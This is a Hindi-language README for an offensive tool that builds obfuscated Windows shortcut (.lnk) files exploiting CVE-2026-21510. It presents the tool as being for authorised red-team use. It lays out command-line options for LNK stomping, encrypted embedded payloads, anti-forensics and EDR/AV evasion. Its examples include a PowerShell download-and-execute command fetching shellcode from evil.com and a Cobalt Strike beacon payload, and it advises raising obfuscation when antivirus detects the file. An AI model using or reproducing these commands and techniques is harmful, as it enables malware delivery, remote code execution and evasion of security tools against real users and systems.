
CVE-2026-21510 का शोषण करने वाली अस्पष्ट (obfuscated) .lnk फ़ाइलें उत्पन्न करता है, जिसमें LNK स्टॉम्पिंग, एन्क्रिप्टेड पेलोड, और अधिकृत पेनेट्रेशन टेस्टिंग तथा रेड टीम ऑपरेशन के लिए एंटी-फोरेंसिक्स शामिल हैं।
README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK जनरेटर CVE-2026-21510 (Windows ShellLink Remote Code Execution) भेद्यता का उपयोग करके .lnk फ़ाइलें बनाने का उपकरण। आक्रामक सुरक्षा अनुसंधान, अधिकृत पैठ परीक्षण, और भेद्यता विश्लेषण के लिए डिज़ाइन किया गया।
कानूनी चेतावनी ⚠️ यह उपकरण केवल कानूनी और अधिकृत उपयोग के लिए है। सिस्टम या नेटवर्क के खिलाफ कोई भी अनधिकृत उपयोग स्थानीय और अंतर्राष्ट्रीय कानूनों का उल्लंघन करेगा (जैसे: Computer Fraud and Abuse Act (CFAA), GDPR, फ्रांस में Loi Godfrain)। लेखक किसी भी दुरुपयोग के लिए जिम्मेदारी अस्वीकार करता है। (नीचे गैर-जिम्मेदारी खंड देखें।)
विवरण यह जनरेटर CVE-2026-21510 का उपयोग करने के लिए अस्पष्ट (obfuscated) .lnk फ़ाइलें बनाता है, जो Windows शॉर्टकट प्रोसेसिंग में एक भेद्यता है। इसमें शामिल है:
LNK Stomping (5 प्रकार: dot, path_segment, relative, double_extension, unicode)
यादृच्छिक CLSID और PKEY के साथ PropertyStore
KnownFolderDataBlock (यादृच्छिक या लक्षित KnownFolderID)
EnvironmentVariableDataBlock (यूनिकोड अस्पष्टीकरण, गतिशील चर)
अस्पष्टीकरण (स्तर 1-5: TrackerDataBlock, ConsoleDataBlock, यादृच्छिक ब्लॉक)
एम्बेडेड और एन्क्रिप्टेड पेलोड (AES-256-CBC + XOR)
एंटी-फोरेंसिक्स (टाइमस्टैम्प 0 पर, फ़ाइल आकार 0 पर, न्यूनतम मेटाडेटा)
EDR/AV बाईपास (वैध प्रक्रियाएं, PowerShell में अस्पष्ट तर्क)
यादृच्छिक प्रकारों का निर्माण (हस्ताक्षर से बचने के लिए 10+ अद्वितीय प्रकार)
आवश्यक शर्तें सिस्टम OS: Windows (जनरेट किए गए .lnk का परीक्षण करने के लिए) या Linux/macOS (जनरेशन के लिए)।
Python: ≥ 3.10। निर्भरताएं: pip install pycryptodome
अनुशंसित उपकरण विश्लेषण: PEStudio, Detect It Easy (DIE)
डीबग: x64dbg, WinDbg
परीक्षण: पृथक Windows वर्चुअल मशीन (जैसे: VirtualBox पर Windows 10/11)।
स्थापना रिपॉजिटरी क्लोन करें: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk निर्भरताएं स्थापित करें: pip install -r requirements.txt (वैकल्पिक) वर्चुअल वातावरण बनाएं: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows
उपयोग
बुनियादी जनरेशन python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk calc.exe लॉन्च करने के लिए CVE-2026-21510 का उपयोग करके एक .lnk बनाता है।
उन्नत विकल्प विकल्प विवरण डिफ़ॉल्ट मान --target लक्ष्य पथ (जैसे: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args लक्ष्य के लिए तर्क (जैसे: /c whoami) /c calc.exe --output .lnk का आउटपुट पथ ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir कार्यशील निर्देशिका C:\Windows\System32 --description शॉर्टकट का विवरण यादृच्छिक स्ट्रिंग --unc UNC पथ का उपयोग करें (?\C:...) False --lnk-stomping LNK Stomping सक्षम करें True --stomping-variant LNK Stomping प्रकार (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation अनावश्यक ExtraData ब्लॉक जोड़ें True --obfuscation-level अस्पष्टीकरण स्तर (1-5) 5 --embed-payload एम्बेड करने के लिए फ़ाइल का पथ (जैसे: payload.bin) None --encrypt-payload पेलोड एन्क्रिप्ट करें (AES-256-CBC + XOR) True --anti-forensics एंटी-फोरेंसिक्स तकनीक लागू करें True --randomize-clsid PropertyStore में CLSID यादृच्छिक करें True --randomize-known-folder KnownFolderID यादृच्छिक करें True --obfuscate-arguments तर्क अस्पष्ट करें (PowerShell) True --generate-variants N यादृच्छिक प्रकार बनाएं 0 --debug उन्नत डीबग मोड (विस्तृत लॉग) False
उदाहरण
उदाहरण 1: एम्बेडेड पेलोड के साथ एक्सप्लॉइट
python lnkstomperpoint.py
--target "C:\Windows\System32\cmd.exe"
--args "/c payload.exe"
--embed-payload ./malware.bin
--output exploit_with_payload.lnk
--obfuscation-level 5
--anti-forensics
एन्क्रिप्टेड (AES-256 + XOR) और अस्पष्ट पेलोड के साथ एक .lnk बनाता है।
उदाहरण 2: 10 यादृच्छिक प्रकारों का निर्माण
python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants
EDR/AV हस्ताक्षरों से बचने के लिए 10 अद्वितीय प्रकार बनाता है।
उदाहरण 3: न्यूनतम मोड (परीक्षण के लिए)
python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk
एक गैर-अस्पष्ट .lnk बनाता है (विश्लेषण या डीबग के लिए)।
तकनीकी कार्यप्रणाली
ShellLink हेडर (0x4C निश्चित बाइट्स + ऑफसेट): LinkCLSID: 00021401-0000-0000-C000-000000000046 (अनिवार्य)। LinkFlags: HasRelativePath, HasWorkingDir, IsUnicode आदि सक्षम करने के लिए कॉन्फ़िगर किया गया।
StringData: RelativePath: लक्ष्य पथ (यदि सक्षम हो तो LNK Stomping के साथ)। WorkingDir: कार्यशील निर्देशिका (जैसे: C:\Windows\System32)। Arguments: अस्पष्ट तर्क (PowerShell, cmd, आदि)।
ExtraData ब्लॉक (महत्वपूर्ण क्रम): PropertyStoreDataBlock: PKEY_AppUserModel_ID शामिल है (यादृच्छिक CLSID)। KnownFolderDataBlock: सिस्टम फ़ोल्डर की ओर इशारा करता है (जैसे: %SystemRoot%)। EnvironmentVariableDataBlock: Mark-of-the-Web (MotW) से पहले चरों के विस्तार को बाध्य करता है। अस्पष्टीकरण ब्लॉक (obfuscation_level के अनुसार): TrackerDataBlock (स्तर 1) ConsoleDataBlock (स्तर 2) DarwinDataBlock, ShimDataBlock, आदि (स्तर 3-5)
एम्बेडेड पेलोड (यदि --embed-payload): AES-256-CBC + XOR के साथ एन्क्रिप्टेड।
पेलोड AES-256-CBC के साथ एन्क्रिप्ट किया गया है (32-बाइट यादृच्छिक कुंजी, 16-बाइट IV)।
AES कुंजी के पहले 16 बाइट्स के साथ एक XOR परत लागू की जाती है।
कुंजी और IV बाद में डिक्रिप्शन के लिए ShimDataBlock में संग्रहीत किए जाते हैं।
परीक्षण और सत्यापन
फ़ाइल का न्यूनतम आकार।
HeaderSize और CLSID की वैधता।
आवश्यक LinkFlags की उपस्थिति।
ExtraData ब्लॉकों की संरचना (PropertyStore, KnownFolder, आदि)।
निष्पादन (पृथक वातावरण में): .lnk पर डबल-क्लिक करें और व्यवहार का निरीक्षण करें। सिस्टम कॉल का विश्लेषण करने के लिए Process Monitor (ProcMon) का उपयोग करें।
EDR/AV डिटेक्शन: Windows Defender या CrowdStrike जैसे उपकरणों के साथ परीक्षण करें। यदि .lnk का पता चलता है, तो obfuscation_level बढ़ाएं या कुछ विकल्प अक्षम करें।
उपयोग के मामले परिदृश्य कमांड विवरण पैठ परीक्षण --target "C:\Windows\System32\cmd.exe" --args "/c whoami" जांचता है कि एक्सप्लॉइट लक्ष्य मशीन पर काम करता है या नहीं। Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 अस्पष्ट Cobalt Strike पेलोड के साथ एक .lnk बनाता है। अनुसंधान --generate-variants 50 --output-dir ./samples EDR डिटेक्शन का परीक्षण करने के लिए 50 प्रकार बनाता है। डीबग --debug --obfuscation False .lnk की संरचना का विश्लेषण करने के लिए विस्तृत लॉग प्रदर्शित करता है। योगदान योगदान का स्वागत है! योगदान करने का तरीका यहां दिया गया है:
प्रोजेक्ट को फोर्क करें।
एक ब्रांच बनाएं (git checkout -b feature/मेरी-नई-सुविधा)।
अपने परिवर्तन कमिट करें (git commit -m "सुविधा X जोड़ी गई")।
ब्रांच को पुश करें (git push origin feature/मेरी-नई-सुविधा)।
एक Pull Request खोलें। योगदान विचार:
LNK Stomping के नए प्रकार जोड़ें।
अन्य एन्क्रिप्शन एल्गोरिदम लागू करें (जैसे: ChaCha20)।